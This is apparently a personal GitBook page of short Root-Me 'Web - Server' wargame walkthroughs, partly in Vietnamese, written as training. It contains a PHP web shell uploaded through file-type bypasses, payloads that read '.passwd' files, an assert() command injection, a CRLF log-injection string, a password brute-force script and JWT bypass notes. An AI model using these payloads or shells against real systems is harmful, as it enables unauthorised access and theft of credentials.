GiongfNef
  • 📧Readme
  • 💰Bug Bounty
    • Business Logic: Bypass 2FA to ATO
    • 1 Click Account Take Over
  • 🥑CVE
    • CVE-2024-40492: Stored XSS to ATO
    • CVE-2023-5311
  • ☕Writeup CTF
    • Crypto
      • dvCTF 2022
      • Crew CTF 2022
      • ångstromCTF 2022
      • picoCTF 2022 + wscCTF 2022
      • Securinets CTF Quals 2022
      • NsuCrypto
      • KMA chall 2022
      • SEETF 2022
      • just CTF 2022
      • zer0pts CTF 2022
    • Web
      • ASCIS 2022 - warm up
      • RISEC CTF + UMass CTF 2022
      • LIT 2022
      • UIUCTF 2022
      • nullcon CTF2022
      • 🎃Hack The Boo 2022
    • Writeup Intigriti challenge-0923
  • 🍄Linh tinh ký sự
    • 📚Books
    • note linh tinh
      • 🐞Bug logic Shopee: Giảm 5-10% khi mua sản phẩm ?
      • 💎Financial Aid Application for Coursera
  • 🫖Wargame && Others
    • 🍀OverTheWire: Bandit
      • 🌱OverTheWire: Bandit 2022 (new)
      • 🍃OverTheWire: (old) - Bandit
      • Writeup EVABSv5.apk (12levels)
    • 📲Android
      • 📲Writeup EVABSv5.apk (Solution 12 levels)
      • 🎮Writeup droids PicoCTF - (Solution 5 levels)
    • 🌵Rootme
      • 🏝️Web - Server
      • 📟App - System
        • 🎰ELF x86 - Format string bug basic 1
        • 🐰ELF x86 - Stack buffer overflow basic 1
        • 🦊ELF x86 - Stack buffer overflow basic 2
        • 🐻ELF x86 - Stack buffer overflow basic 3
        • 🐼ELF x86 - Stack buffer overflow basic 4
        • 🐧ELF x86 - Stack buffer overflow basic 6
    • 🏆Pentest
    • 🖇️Blockchain
Powered by GitBook
On this page
  • Web - Server
  • 1.HTML - Source code
  • 2.HTTP - IP restriction bypass
  • 3.HTTP - Open redirect
  • 4.HTTP - User-agent
  • 5.Weak password
  • 6.PHP - Command injection
  • 7.Backup file
  • 8.HTTP - Directory indexing
  • 9.HTTP - Headers
  • 10.HTTP - POST
  • 11.HTTP - Improper redirect
  • 12.HTTP - Verb tampering
  • 13.File upload - Double extensions
  • 14.File upload - MIME type
  • 15.HTTP - Cookies
  • 16.JSON Web Token (JWT) - Introduction
  • 17.Directory traversal
  • 18.JSON Web Token (JWT) - Weak secret
  • 19.File upload - Null byte
  • 20.Install files
  • 21. JWT - Revoked token
  • 22. CRLF
  • 23. Insecure Code Management
  • 24.PHP - assert()
Edit on GitHub
  1. Wargame && Others
  2. Rootme

Web - Server

Note : A JOURNEY TO GAIN KNOWLEDGE

PreviousRootmeNextApp - System

Last updated 2 years ago

Web - Server

1.

F12 for flag

2.

Syntax: X-Forwarded-For: <client>,<proxy1>,<proxy2>,<proxy3>

Change IP at client to private IP by adding an X-Forwarded-For header

It combines URL and hash md5 of that one, so that we just put other URL and hash of it.

4.HTTP - User-agent

change User-Agent to `admin`

5.Weak password

import requests
from requests.auth import HTTPBasicAuth
url = "http://challenge01.root-me.org/web-serveur/ch3/"
usr = "admin"
words = open('common_password.txt','r').read().split('\n')
cnt =1
for pwd in words:
	print(pwd,cnt)
	
	res = requests.get(url, auth=HTTPBasicAuth(usr, pwd))
	
	if "401" not in res.text:
		print('Password is ' + pwd)
		break
	cnt +=1

6.PHP - Command injection

7.Backup file

Use dirsearch find some interesting files:

/web-serveur/ch11/index.php~

8.HTTP - Directory indexing

9.HTTP - Headers

With normal request we will get:

add Header to request:

Header-RootMe-Admin: True

10.HTTP - POST

11.HTTP - Improper redirect

Capture before it redirect

12.HTTP - Verb tampering

Ban đầu tưởng bruteforce ngồi xài hydra và cái rockyou.txt ra spam cả tiếng

temper ở đây là chỉ cần đổi method khác ngoài GET và POST là được, cứ PUT với DELETE mà phang

13.File upload - Double extensions

<?php echo shell_exec($_GET['cmd']); ?>

set file.php.png and send to the server

?cmd=cd;cat .passwd

14.File upload - MIME type

Change Content-Type to image/png and rce

?id=cd;cat .passwd

15.HTTP - Cookies

change cookie from visiteur to admin

16.JSON Web Token (JWT) - Introduction

"none" signature algorithms

17.Directory traversal

Try with ../ and fuzz

18.JSON Web Token (JWT) - Weak secret

bruteforce secret key: lol

POST and look for the flag hm....

19.File upload - Null byte

create: file.php%0a.png

<?php echo shell_exec('id'); ?>

20.Install files

use dirsearch: /web-serveur/ch6/phpbb/install

21. JWT - Revoked token

source

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, request, jsonify
from flask_jwt_extended import JWTManager, jwt_required, create_access_token, decode_token
import datetime
from apscheduler.schedulers.background import BackgroundScheduler
import threading
import jwt
from config import *
 
# Setup flask
app = Flask(__name__)
 
app.config['JWT_SECRET_KEY'] = SECRET
jwtmanager = JWTManager(app)
blacklist = set()
lock = threading.Lock()
 
# Free memory from expired tokens, as they are no longer useful
def delete_expired_tokens():
    with lock:
        to_remove = set()
        global blacklist
        for access_token in blacklist:
            try:
                jwt.decode(access_token, app.config['JWT_SECRET_KEY'],algorithm='HS256')
            except:
                to_remove.add(access_token)
       
        blacklist = blacklist.difference(to_remove)
 
@app.route("/web-serveur/ch63/")
def index():
    return "POST : /web-serveur/ch63/login <br>\nGET : /web-serveur/ch63/admin"
 
# Standard login endpoint
@app.route('/web-serveur/ch63/login', methods=['POST'])
def login():
    try:
        username = request.json.get('username', None)
        password = request.json.get('password', None)
    except:
        return jsonify({"msg":"""Bad request. Submit your login / pass as {"username":"admin","password":"admin"}"""}), 400
 
    if username != 'admin' or password != 'admin':
        return jsonify({"msg": "Bad username or password"}), 401
 
    access_token = create_access_token(identity=username,expires_delta=datetime.timedelta(minutes=3))
    ret = {
        'access_token': access_token,
    }
   
    with lock:
        blacklist.add(access_token)
 
    return jsonify(ret), 200
 
# Standard admin endpoint
@app.route('/web-serveur/ch63/admin', methods=['GET'])
@jwt_required
def protected():
    access_token = request.headers.get("Authorization").split()[1]
    with lock:
        if access_token in blacklist:
            return jsonify({"msg":"Token is revoked"})
        else:
            return jsonify({'Congratzzzz!!!_flag:': FLAG})
 
 
if __name__ == '__main__':
    scheduler = BackgroundScheduler()
    job = scheduler.add_job(delete_expired_tokens, 'interval', seconds=10)
    scheduler.start()
    app.run(debug=False, host='0.0.0.0', port=5000)

Use python request to post data:

import requests

url = "http://challenge01.root-me.org/web-serveur/ch63/login"
myobj = {"username": "admin","password": "admin"}
x = requests.post(url, json = myobj)

print(x.text)
#{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NjA3MzI2MjcsIm5iZiI6MTY2MDczMjYyNywianRpIjoiNzFjYTYxYTEtNjU1Yy00Zjk5LTkwM2ItODViZjBjMjI4ZmQ3IiwiZXhwIjoxNjYwNzMyODA3LCJpZGVudGl0eSI6ImFkbWluIiwiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.7koOz8cupf0o2ZtMA_pr_03cKXq-uIcTgp6zGKMts-g"}

The problem that we have to bypass blacklist because with each access_token it will be added to blacklist:

  • with rfc3548 we can see that the character out of alphabet will be skipped

  • underscore “_” , then replace with “/”

  • add == in the end of jwt -> fast way to understand

22. CRLF

Input -> fuzz

Thử nhập bừa username và passoword ta thấy rõ log ghi lại username -> tấn công từ đây

Mục tiêu là có thể log lạiadminauthenticated.

?username=admin authenticated.%0d%0aa&password=b

gửi payload trên url và urlencode để server decode lại

23. Insecure Code Management

24.PHP - assert()

Detect lỗi File Inclusion -> LFI via PHP's 'assert

Khả nghi:

GET /web-serveur/ch47/?page= ...

command:

' and die(system("cat .passwd")) or '

3.

HTTP - Open redirect
document
http://challenge01.root-me.org/web-serveur/ch4/admin/backup/admin.txt
doc
http://challenge01.root-me.org/web-serveur/ch61/.git
doc
doc2
🫖
🌵
🏝️
HTML - Source code
HTTP - IP restriction bypass
document
chan
sign new signature
Page cover image